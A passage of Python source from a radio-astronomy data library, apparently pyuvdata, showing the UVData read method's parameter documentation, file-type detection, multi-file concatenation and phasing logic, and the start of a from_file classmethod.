remove_dig_gains : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out digital
gains.
remove_coarse_band : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out coarse
band shape.
correct_cable_len : bool
Flag to apply cable length correction. Only used if file_type is
'mwa_corr_fits'.
correct_van_vleck : bool
Flag to apply a van vleck correction. Only used if file_type is
'mwa_corr_fits'.
cheby_approx : bool
Only used if file_type is 'mwa_corr_fits' and correct_van_vleck is True.
Option to implement the van vleck correction with a chebyshev polynomial
approximation. Set to False to run the integral version of the correction.
flag_small_auto_ants : bool
Only used if correct_van_vleck is True. Option to completely flag any
antenna for which the autocorrelation falls below a threshold found by
the Van Vleck correction to indicate bad data. Specifically, the
threshold used is 0.5 * integration_time * channel_width. If set to False,
only the times and frequencies at which the auto is below the
threshold will be flagged for the antenna. Only used if file_type is
'mwa_corr_fits'.
flag_small_sig_ants : bool
Being replaced by flag_small_auto_ants and will be removed in v2.4.
propagate_coarse_flags : bool
Option to propagate flags for missing coarse channel integrations
across frequency. Only used if file_type is 'mwa_corr_fits'.
flag_init : bool
Only used if file_type is 'mwa_corr_fits'. Set to True in order to
do routine flagging of coarse channel edges, start or end
integrations, or the center fine channel of each coarse
channel. See associated keywords.
edge_width : float
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the width to flag on the edge of each coarse channel, in Hz.
Errors if not equal to integer multiple of channel_width. Set to 0
for no edge flagging.
start_flag : float or str
Only used if flag_init is True. The number of seconds to flag at the
beginning of the observation. Set to 0 for no flagging. Default is
'goodtime', which uses information in the metafits file to determine
the length of time that should be flagged. Errors if input is not a
float or 'goodtime'. Errors if float input is not equal to an
integer multiple of the integration time.
end_flag : float
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the number of seconds to flag at the end of the observation. Set
to 0 for no flagging. Errors if not an integer multiple of the
integration time.
flag_dc_offset : bool
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to True to flag the center fine channel of each coarse channel.
remove_flagged_ants : bool
Option to perform a select to remove antennas flagged in the metafits
file. If correct_van_vleck and flag_small_auto_ants are both True then
antennas flagged by the Van Vleck correction are also removed.
Only used if file_type is 'mwa_corr_fits'.
phase_to_pointing_center : bool
Flag to phase to the pointing center. Only used if file_type is
'mwa_corr_fits'. Cannot be set if phase_center_radec is not None.
skip_bad_files : bool
Option when reading multiple files to catch read errors such that
the read continues even if one or more files are corrupted. Files
that produce errors will be printed. Default is False (files will
not be skipped).
multidim_index : bool
[Only for HDF5] If True, attempt to index the HDF5 dataset
simultaneously along all data axes. Otherwise index one axis at-a-time.
This only works if data selection is sliceable along all but one axis.
If indices are not well-matched to data chunks, this can be slow.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
isource : int
Source code for MIR dataset
irec : int
Receiver code for MIR dataset
isb : int
Sideband code for MIR dataset
corrchunk : int
Correlator chunk code for MIR dataset
pseudo_cont : bool
Read in only pseudo-continuum values in MIR dataset. Default is False.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
calc_lst : bool
Recalculate the LST values that are present within the file, useful in
cases where the "online" calculated values have precision or value errors.
Default is True. Only applies to MIRIAD files.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False, unless reading a UVH5 file that is missing the `phase_center_app_ra`
and `phase_center_app_dec` attributes (as these were introduced at the same
time as the new `phase` method), in which case the default is True.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. By default, this is only done if reading
in a file with multiple sources.
ignore_name : bool
Only relevant when reading in multiple files, which are concatenated into a
single UVData object. Option to ignore the name of the phase center when
combining multiple files, which would otherwise result in an error being
raised because of attributes not matching. Doing so effectively adopts the
name found in the first file read in. Default is False.
Raises
------
ValueError
If the file_type is not set and cannot be determined from the file name.
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If phase_center_radec is not None and is not length 2.
"""
if isinstance(filename, (list, tuple, np.ndarray)):
# this is either a list of separate files to read or a list of
# FHD files or MWA correlator FITS files
if isinstance(filename[0], (list, tuple, np.ndarray)):
if file_type is None:
# this must be a list of lists of FHD or MWA correlator FITS
basename, extension = os.path.splitext(filename[0][0])
if extension == ".sav" or extension == ".txt":
file_type = "fhd"
elif (
extension == ".fits"
or extension == ".metafits"
or extension == ".mwaf"
):
file_type = "mwa_corr_fits"
multi = True
else:
if file_type is None:
basename, extension = os.path.splitext(filename[0])
if extension == ".sav" or extension == ".txt":
file_type = "fhd"
elif (
extension == ".fits"
or extension == ".metafits"
or extension == ".mwaf"
):
file_type = "mwa_corr_fits"
if file_type == "fhd" or file_type == "mwa_corr_fits":
multi = False
else:
multi = True
else:
multi = False
if file_type is None:
if multi:
file_test = filename[0]
else:
file_test = filename
if os.path.isdir(file_test):
# it's a directory, so it's either miriad, mir, or ms file type
if os.path.exists(os.path.join(file_test, "vartable")):
# It's miriad.
file_type = "miriad"
elif os.path.exists(os.path.join(file_test, "OBSERVATION")):
# It's a measurement set.
file_type = "ms"
elif os.path.exists(os.path.join(file_test, "sch_read")):
# It's Submillimeter Array mir format.
file_type = "mir"
else:
basename, extension = os.path.splitext(file_test)
if extension == ".uvfits":
file_type = "uvfits"
elif extension == ".uvh5":
file_type = "uvh5"
if file_type is None:
raise ValueError(
"File type could not be determined, use the "
"file_type keyword to specify the type."
)
if time_range is not None:
if times is not None:
raise ValueError("Only one of times and time_range can be provided.")
if antenna_names is not None and antenna_nums is not None:
raise ValueError(
"Only one of antenna_nums and antenna_names can " "be provided."
)
if multi:
file_num = 0
file_warnings = ""
unread = True
while unread and file_num < len(filename):
f = filename[file_num]
try:
self.read(
filename[file_num],
file_type=file_type,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
time_range=time_range,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
use_model=use_model,
data_column=data_column,
pol_order=pol_order,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
skip_bad_files=skip_bad_files,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
make_multi_phase=make_multi_phase,
)
unread = False
except KeyError as err:
file_warnings = (
file_warnings + f"Failed to read {f} due to KeyError: {err}\n"
)
file_num += 1
if skip_bad_files is False:
raise
except ValueError as err:
file_warnings = (
file_warnings + f"Failed to read {f} due to ValueError: {err}\n"
)
file_num += 1
if skip_bad_files is False:
raise
except OSError as err: # pragma: nocover
file_warnings = (
file_warnings + f"Failed to read {f} due to OSError: {err}\n"
)
file_num += 1
if skip_bad_files is False:
raise
if (
allow_rephase
and phase_center_radec is None
and not unphase_to_drift
and self.phase_type == "phased"
and not self.multi_phase_center
and not make_multi_phase
):
# set the phase center to be the phase center of the first file
phase_center_radec = [self.phase_center_ra, self.phase_center_dec]
phase_frame = self.phase_center_frame
phase_epoch = self.phase_center_epoch
uv_list = []
if len(filename) > file_num + 1:
for f in filename[file_num + 1 :]:
uv2 = UVData()
try:
uv2.read(
f,
file_type=file_type,
phase_center_radec=phase_center_radec,
phase_frame=phase_frame,
phase_epoch=phase_epoch,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
time_range=time_range,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
use_model=use_model,
data_column=data_column,
pol_order=pol_order,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
skip_bad_files=skip_bad_files,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
make_multi_phase=make_multi_phase,
)
uv_list.append(uv2)
except KeyError as err:
file_warnings = (
file_warnings
+ f"Failed to read {f} due to KeyError: {err}\n"
)
if skip_bad_files:
continue
else:
raise
except ValueError as err:
file_warnings = (
file_warnings
+ f"Failed to read {f} due to ValueError: {err}\n"
)
if skip_bad_files:
continue
else:
raise
except OSError as err: # pragma: nocover
file_warnings = (
file_warnings
+ f"Failed to read {f} due to OSError: {err}\n"
)
if skip_bad_files:
continue
else:
raise
if unread is True:
warnings.warn(
"########################################################\n"
"ALL FILES FAILED ON READ - NO READABLE FILES IN FILENAME\n"
"########################################################"
)
elif len(file_warnings) > 0:
warnings.warn(file_warnings)
# Concatenate once at end
if axis is not None:
# Rewrote fast_concat to operate on lists
self.fast_concat(
uv_list,
axis,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=phase_use_ant_pos,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
inplace=True,
ignore_name=ignore_name,
)
else:
# Too much work to rewrite __add__ to operate on lists
# of files, so instead doing a binary tree merge
uv_list = [self] + uv_list
while len(uv_list) > 1:
for uv1, uv2 in zip(uv_list[0::2], uv_list[1::2]):
uv1.__iadd__(
uv2,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=phase_use_ant_pos,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
ignore_name=ignore_name,
)
uv_list = uv_list[0::2]
# Because self was at the beginning of the list,
# everything is merged into it at the end of this loop
else:
if file_type in ["fhd", "ms", "mwa_corr_fits"]:
if (
antenna_nums is not None
or antenna_names is not None
or ant_str is not None
or bls is not None
or frequencies is not None
or freq_chans is not None
or times is not None
or time_range is not None
or polarizations is not None
or blt_inds is not None
):
select = True
warnings.warn(
"Warning: select on read keyword set, but "
'file_type is "{ftype}" which does not support select '
"on read. Entire file will be read and then select "
"will be performed".format(ftype=file_type)
)
# these file types do not have select on read, so set all
# select parameters
select_antenna_nums = antenna_nums
select_antenna_names = antenna_names
select_ant_str = ant_str
select_bls = bls
select_frequencies = frequencies
select_freq_chans = freq_chans
select_times = times
select_time_range = time_range
select_polarizations = polarizations
select_blt_inds = blt_inds
else:
select = False
elif file_type in ["uvfits", "uvh5"]:
select = False
elif file_type in ["miriad"]:
if (
antenna_names is not None
or frequencies is not None
or freq_chans is not None
or times is not None
or blt_inds is not None
):
if blt_inds is not None:
if (
antenna_nums is not None
or ant_str is not None
or bls is not None
or time_range is not None
):
warnings.warn(
"Warning: blt_inds is set along with select "
"on read keywords that are supported by "
"read_miriad and may downselect blts. "
"This may result in incorrect results "
"because the select on read will happen "
"before the blt_inds selection so the indices "
"may not match the expected locations."
)
else:
warnings.warn(
"Warning: a select on read keyword is set that is "
"not supported by read_miriad. This select will "
"be done after reading the file."
)
select = True
# these are all done by partial read, so set to None
select_antenna_nums = None
select_ant_str = None
select_bls = None
select_time_range = None
select_polarizations = None
# these aren't supported by partial read, so do it in select
select_antenna_names = antenna_names
select_frequencies = frequencies
select_freq_chans = freq_chans
select_times = times
select_blt_inds = blt_inds
else:
select = False
# reading a single "file". Call the appropriate file-type read
if file_type == "uvfits":
self.read_uvfits(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
read_data=read_data,
keep_all_metadata=keep_all_metadata,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
elif file_type == "mir":
self.read_mir(
filename,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
)
select = False
elif file_type == "miriad":
self.read_miriad(
filename,
antenna_nums=antenna_nums,
ant_str=ant_str,
bls=bls,
polarizations=polarizations,
time_range=time_range,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
elif file_type == "mwa_corr_fits":
self.read_mwa_corr_fits(
filename,
use_aoflagger_flags=use_aoflagger_flags,
use_cotter_flags=use_cotter_flags,
remove_dig_gains=remove_dig_gains,
remove_coarse_band=remove_coarse_band,
correct_cable_len=correct_cable_len,
correct_van_vleck=correct_van_vleck,
cheby_approx=cheby_approx,
flag_small_auto_ants=flag_small_auto_ants,
flag_small_sig_ants=flag_small_sig_ants,
propagate_coarse_flags=propagate_coarse_flags,
flag_init=flag_init,
edge_width=edge_width,
start_flag=start_flag,
end_flag=end_flag,
flag_dc_offset=flag_dc_offset,
remove_flagged_ants=remove_flagged_ants,
phase_to_pointing_center=phase_to_pointing_center,
read_data=read_data,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
elif file_type == "fhd":
self.read_fhd(
filename,
use_model=use_model,
background_lsts=background_lsts,
read_data=read_data,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
elif file_type == "ms":
self.read_ms(
filename,
data_column=data_column,
pol_order=pol_order,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
elif file_type == "uvh5":
self.read_uvh5(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
read_data=read_data,
data_array_dtype=data_array_dtype,
keep_all_metadata=keep_all_metadata,
multidim_index=multidim_index,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
select = False
if select:
self.select(
antenna_nums=select_antenna_nums,
antenna_names=select_antenna_names,
ant_str=select_ant_str,
bls=select_bls,
frequencies=select_frequencies,
freq_chans=select_freq_chans,
times=select_times,
time_range=select_time_range,
polarizations=select_polarizations,
blt_inds=select_blt_inds,
keep_all_metadata=keep_all_metadata,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if make_multi_phase:
self._set_multi_phase_center(preserve_phase_center_info=True)
if unphase_to_drift:
if self.phase_type != "drift":
warnings.warn("Unphasing this UVData object to drift")
self.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=phase_use_ant_pos,
)
if phase_center_radec is not None:
if np.array(phase_center_radec).size != 2:
raise ValueError("phase_center_radec should have length 2.")
# If this object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if self.phase_type == "drift" or (
not np.isclose(
self.phase_center_ra,
phase_center_radec[0],
rtol=self._phase_center_ra.tols[0],
atol=self._phase_center_ra.tols[1],
)
or not np.isclose(
self.phase_center_dec,
phase_center_radec[1],
rtol=self._phase_center_dec.tols[0],
atol=self._phase_center_dec.tols[1],
)
or (self.phase_center_frame != phase_frame)
or (self.phase_center_epoch != phase_epoch)
):
warnings.warn("Phasing this UVData object to phase_center_radec")
self.phase(
phase_center_radec[0],
phase_center_radec[1],
epoch=phase_epoch,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=phase_use_ant_pos,
allow_rephase=True,
)
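# Multi-file usage sketch (comments only; file names are hypothetical):
#
#     uv = UVData()
#     # Reading a list concatenates the files; passing `axis` routes the
#     # combination through fast_concat instead of the binary-tree __add__.
#     uv.read(["obs1.uvh5", "obs2.uvh5"], axis="blt", skip_bad_files=True)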
@classmethod
def from_file(
cls,
filename,
axis=None,
file_type=None,
allow_rephase=True,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
phase_epoch=None,
orig_phase_frame=None,
phase_use_ant_pos=True,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
polarizations=None,
blt_inds=None,
time_range=None,
keep_all_metadata=True,
read_data=True,
phase_type=None,
correct_lat_lon=True,
use_model=False,
data_column="DATA",
pol_order="AIPS",
data_array_dtype=np.complex128,
nsample_array_dtype=np.float32,
use_aoflagger_flags=None,
use_cotter_flags=None,
remove_dig_gains=True,
remove_coarse_band=True,
correct_cable_len=False,
correct_van_vleck=False,
cheby_approx=True,
flag_small_auto_ants=True,
flag_small_sig_ants=None,
propagate_coarse_flags=True,
flag_init=True,
edge_width=80e3,
start_flag="goodtime",
end_flag=0.0,
flag_dc_offset=True,
remove_flagged_ants=True,
phase_to_pointing_center=False,
skip_bad_files=False,
multidim_index=False,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
isource=None,
irec=None,
isb=None,
corrchunk=None,
pseudo_cont=False,
lsts=None,
lst_range=None,
calc_lst=True,
fix_old_proj=None,
fix_use_ant_pos=True,
make_multi_phase=False,
ignore_name=False,
):
"""
Initialize a new UVData object by reading the input file.
Parameters
----------
filename : str or array_like of str
The file(s) or list(s) (or array(s)) of files to read from.
file_type : str
One of ['uvfits', 'miriad', 'fhd', 'ms', 'uvh5'] or None.
If None, the code attempts to guess what the file type is.
For miriad and ms types, this is based on the standard directory
structure. For FHD, uvfits and uvh5 files it's based on file
extensions (FHD: .sav, .txt; uvfits: .uvfits; uvh5: .uvh5).
Note that if a list of datasets is passed, the file type is
determined from the first dataset.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
allow_rephase : bool
Allow rephasing of phased file data so that data from files with
different phasing can be combined.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). If set to None and multiple files are
read with different phase centers, the phase center of the first
file will be used.
unphase_to_drift : bool
Unphase the data from the files before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & aberration.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
phase_use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
antenna_nums : array_like of int, optional
The antenna numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
The antenna names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of the `antenna_nums`,
`antenna_names`, `bls`, or `polarizations` parameters;
if it is, a ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
polarizations : array_like of int, optional
The polarization numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the data. Only used if file_type is 'uvfits',
'miriad' or 'uvh5'. If set to False, only the metadata will be
read in. Setting read_data to False results in a metadata only
object.
phase_type : str, optional
Option to specify the phasing status of the data. Only used if
file_type is 'miriad'. Options are 'drift', 'phased' or None.
'drift' means the data are zenith drift data, 'phased' means the
data are phased to a single RA/Dec. Default is None
meaning it will be guessed at based on the file contents.
correct_lat_lon : bool
Option to update the latitude and longitude from the known_telescopes
list if the altitude is missing. Only used if file_type is 'miriad'.
use_model : bool
Option to read in the model visibilities rather than the dirty
visibilities (the default is False, meaning the dirty visibilities
will be read). Only used if file_type is 'fhd'.
data_column : str
Name of the CASA data column to read into data_array. Options are:
'DATA', 'MODEL', or 'CORRECTED_DATA'. Only used if file_type is 'ms'.
pol_order : str
Option to specify polarizations order convention, options are
'CASA' or 'AIPS'. Only used if file_type is 'ms'.
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128 (double-
precision real and imaginary). Only used if the datatype of the visibility
data on-disk is not 'c8' or 'c16'. Only used if file_type is 'uvh5' or
'mwa_corr_fits'.
nsample_array_dtype : numpy dtype
Datatype to store the output nsample_array as. Must be either
np.float64 (double-precision), np.float32 (single-precision), or
np.float16 (half-precision). Half-precision is only recommended for
cases where no sampling or averaging of baselines will occur,
because round-off errors can be quite large (~1e-3). Only used if
file_type is 'mwa_corr_fits'.
use_aoflagger_flags : bool
Only used if file_type is 'mwa_corr_fits'. Option to use aoflagger mwaf
flag files. Defaults to True if aoflagger flag files are submitted.
use_cotter_flags : bool
Being replaced by use_aoflagger_flags and will be removed in v2.4.
remove_dig_gains : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out digital
gains.
remove_coarse_band : bool
Only used if file_type is 'mwa_corr_fits'. Option to divide out coarse
band shape.
correct_cable_len : bool
Flag to apply cable length correction. Only used if file_type is
'mwa_corr_fits'.
correct_van_vleck : bool
Flag to apply a van vleck correction. Only used if file_type is
'mwa_corr_fits'.
cheby_approx : bool
Only used if file_type is 'mwa_corr_fits' and correct_van_vleck is True.
Option to implement the van vleck correction with a chebyshev polynomial
approximation. Set to False to run the integral version of the correction.
flag_small_auto_ants : bool
Only used if correct_van_vleck is True. Option to completely flag any
antenna for which the autocorrelation falls below a threshold found by
the Van Vleck correction to indicate bad data. Specifically, the
threshold used is 0.5 * integration_time * channel_width. If set to False,
only the times and frequencies at which the auto is below the
threshold will be flagged for the antenna. Only used if file_type is
'mwa_corr_fits'.
flag_small_sig_ants : bool
Being replaced by flag_small_auto_ants and will be removed in v2.4.
propagate_coarse_flags : bool
Option to propagate flags for missing coarse channel integrations
across frequency. Only used if file_type is 'mwa_corr_fits'.
flag_init : bool
Only used if file_type is 'mwa_corr_fits'. Set to True in order to
do routine flagging of coarse channel edges, start or end
integrations, or the center fine channel of each coarse
channel. See associated keywords.
edge_width : float
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the width to flag on the edge of each coarse channel, in Hz.
Errors if not equal to integer multiple of channel_width. Set to 0
for no edge flagging.
start_flag : float or str
Only used if flag_init is True. The number of seconds to flag at the
beginning of the observation. Set to 0 for no flagging. Default is
'goodtime', which uses information in the metafits file to determine
the length of time that should be flagged. Errors if input is not a
float or 'goodtime'. Errors if float input is not equal to an
integer multiple of the integration time.
end_flag : float
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to the number of seconds to flag at the end of the observation. Set
to 0 for no flagging. Errors if not an integer multiple of the
integration time.
flag_dc_offset : bool
Only used if file_type is 'mwa_corr_fits' and flag_init is True. Set
to True to flag the center fine channel of each coarse channel.
remove_flagged_ants : bool
Option to perform a select to remove antennas flagged in the metafits
file. If correct_van_vleck and flag_small_auto_ants are both True then
antennas flagged by the Van Vleck correction are also removed.
Only used if file_type is 'mwa_corr_fits'.
phase_to_pointing_center : bool
Flag to phase to the pointing center. Only used if file_type is
'mwa_corr_fits'. Cannot be set if phase_center_radec is not None.
skip_bad_files : bool
Option when reading multiple files to catch read errors such that
the read continues even if one or more files are corrupted. Files
that produce errors will be printed. Default is False (files will
not be skipped).
multidim_index : bool
[Only for HDF5] If True, attempt to index the HDF5 dataset
simultaneously along all data axes. Otherwise index one axis at-a-time.
This only works if data selection is sliceable along all but one axis.
If indices are not well-matched to data chunks, this can be slow.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
isource : int
Source code for MIR dataset
irec : int
Receiver code for MIR dataset
isb : int
Sideband code for MIR dataset
corrchunk : int
Correlator chunk code for MIR dataset
pseudo_cont : bool
Read in only pseudo-continuum values in MIR dataset. Default is False.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
calc_lst : bool
Recalculate the LST values that are present within the file, useful in
cases where the "online" calculated values have precision or value errors.
Default is True. Only applies to MIRIAD files.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False, unless reading a UVH5 file that is missing the `phase_center_app_ra`
and `phase_center_app_dec` attributes (as these were introduced at the same
time as the new `phase` method), in which case the default is True.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. By default, this is only done if reading
in a file with multiple sources.
ignore_name : bool
Only relevant when reading in multiple files, which are concatenated into a
single UVData object. Option to ignore the name of the phase center when
combining multiple files, which would otherwise result in an error being
raised because of attributes not matching. Doing so effectively adopts the
name found in the first file read in. Default is False.
Raises
------
ValueError
If the file_type is not set and cannot be determined from the file name.
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If phase_center_radec is not None and is not length 2.
"""
uvd = cls()
uvd.read(
